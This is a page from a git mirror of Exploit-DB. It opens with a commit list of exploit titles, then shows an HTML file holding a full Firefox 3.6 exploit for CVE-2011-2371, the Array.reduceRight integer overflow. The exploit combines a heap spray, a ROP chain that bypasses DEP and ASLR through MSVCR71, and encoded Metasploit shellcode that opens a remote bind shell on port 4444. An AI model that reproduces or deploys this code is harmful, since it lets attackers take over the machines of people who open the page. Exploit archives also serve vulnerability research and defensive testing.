bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/17974.html
Offensive Security ed0e1e4d44 DB: 2018-09-25 
1979 changes to exploits/shellcodes

Couchdb 1.5.0 - 'uuids' Denial of Service
Apache CouchDB 1.5.0 - 'uuids' Denial of Service

Beyond Remote 2.2.5.3 - Denial of Service (PoC)
udisks2 2.8.0 - Denial of Service (PoC)
Termite 3.4 - Denial of Service (PoC)
SoftX FTP Client 3.3 - Denial of Service (PoC)

Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection
SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection

Silverstripe CMS 3.0.2 - Multiple Vulnerabilities
SilverStripe CMS 3.0.2 - Multiple Vulnerabilities

Silverstripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4 - File Renaming Security Bypass

Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection

Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload

Silverstripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection

Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure

Silverstripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS - Multiple HTML Injection Vulnerabilities

Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation

Monstra CMS before 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)

Monstra CMS < 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Navigate CMS 2.8 - Cross-Site Scripting
Collectric CMU 1.0 - 'lang' SQL injection
Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection
LG SuperSign EZ CMS 2.5 - Remote Code Execution
MyBB Visual Editor 1.8.18 - Cross-Site Scripting
Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
RICOH Aficio MP 301 Printer - Cross-Site Scripting
Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
RICOH MP C6003 Printer - Cross-Site Scripting

Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
2018-09-25 05:01:51 +00:00

162 lines
No EOL
8 KiB
HTML
Raw Blame History

# Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit
# Date: 12 Oct 2011
# Author: Matteo Memelli ryujin -AT- offensive-security.com
# CVE-2011-2371
# Full exploit package: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17974.zip
<html>
<head>
<title>ff-i-<3-u</title>
</head>
<body>
<center>
<br />
Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit<br />
Date: 12 Oct 2011<br />
Author: Matteo Memelli ryujin -AT- offensive-security.com<br />
CVE-2011-2371<br />
Full exploit package: <br />
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17974.zip <br />
<br />
Thx to dookie for helping ;)<br/>
Vulnerability discovered by Chris Rohlf and Yan Ivnitskiy of Matasano Security<br />
http://www.mozilla.org/security/announce/2011/mfsa2011-22.html<br/>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2371<br/>
DEP / ASLR bypassing through JAVA MSVCR71 sayonara rop chain<br/>
Tested on Windows 7 Ultimate / firefox 3.6.16 and 3.6.17<br/><br/>
<APPLET id="MyApplet" code="ph33r.class" width=150 height=50>
You need a Java-enabled browser to pwn this.
</APPLET>
</center>
<script type="text/javascript">
var applet = document.getElementById('MyApplet');
function spray() {
// fake object pointers
var ptrs = unescape("%u4141" + // padding
// MOV EDX,DWORD[ESI] 0c000048=0c00007c
"%u0048%u0c00" +
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141" + // padding
// PIVOT MSVCR71.dll 0x7C370EEF LEA ESP,[ESI-3]
// RETN 1C75
"%u0EEF%u7C37" +
"%u4141%u4141" + // padding
"%u4141" + // padding
"%u240c%u3410" + // 3410240c RETN after PIVOT
"%u007c%u0c00" + // 0c00007c PTR TO END OF BUFFER
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u002e%u0c00"); // 0c00007c -> 0c00002e
// CALL PIVOT 0x7C370EEF
var bheader = 0x12/2; // u.n.d.e.f.i.n.e.d. string
// beginning of each array element
var nullt = 0x2/2; // string null terminator
// 0:000> ? 0c001cbe - 0c000012
// Evaluate expression: 7340 = 00001cac
var espoffset = (7340 /2) - ptrs.length;
var esppadding = unescape("%u0c0c%u0c0c");
while(esppadding.length < espoffset) {esppadding += esppadding;}
esppadding = esppadding.substring(0, espoffset);
// sayonara rop chain
rop = unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
rop += unescape("%u5645%u7c36"); // pop esi;ret;
rop += unescape("%u5243%u7c34"); // ret;
rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
rop += unescape("%u87ec%u7c34"); // call eax;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ufdff%uffff"); // {size}
rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
rop += unescape("%u39fa%u7c34"); // pop edx;ret;
rop += unescape("%uffc0%uffff"); // {flag}
rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
rop += unescape("%u4648%u7c35"); // pop edi;ret;
rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
rop += unescape("%u683f%u7c36"); // push esp;ret;
rop += unescape("%ubc90%u0c0c%u0c0c"); // NOP / MOV ESP,0x0c0c0c0c
// windows/shell_bind_tcp - 341 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, EXITFUNC=process,
// InitialAutoRunScript=, AutoRunScript=
var shell = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");
rop += shell;
var tr_padding = unescape("%u0c0c%u0c0c");
while(tr_padding.length < 0x80000) {tr_padding += tr_padding;}
var dummy = ptrs + esppadding + rop + tr_padding;
var hspray = dummy.substring(0,0x80000 - bheader - nullt);
// Allocation of 64 blocks of 1Mb.
HeapBlocks = new Array()
for (i=0;i<0x40;i++){
HeapBlocks[i] += hspray;
}
}
spray();
hola = new Array;
hola.length = 2197815302; // 0x0c000014 beginning of sprayed block
w00t = function ph33r(prev, myobj, indx, array) {
alert(myobj[0]); // trigger getProperty
}
hola.reduceRight(w00t,1,2,3);
</script>
</body>
</html>
Reference in a new issue View git blame Copy permalink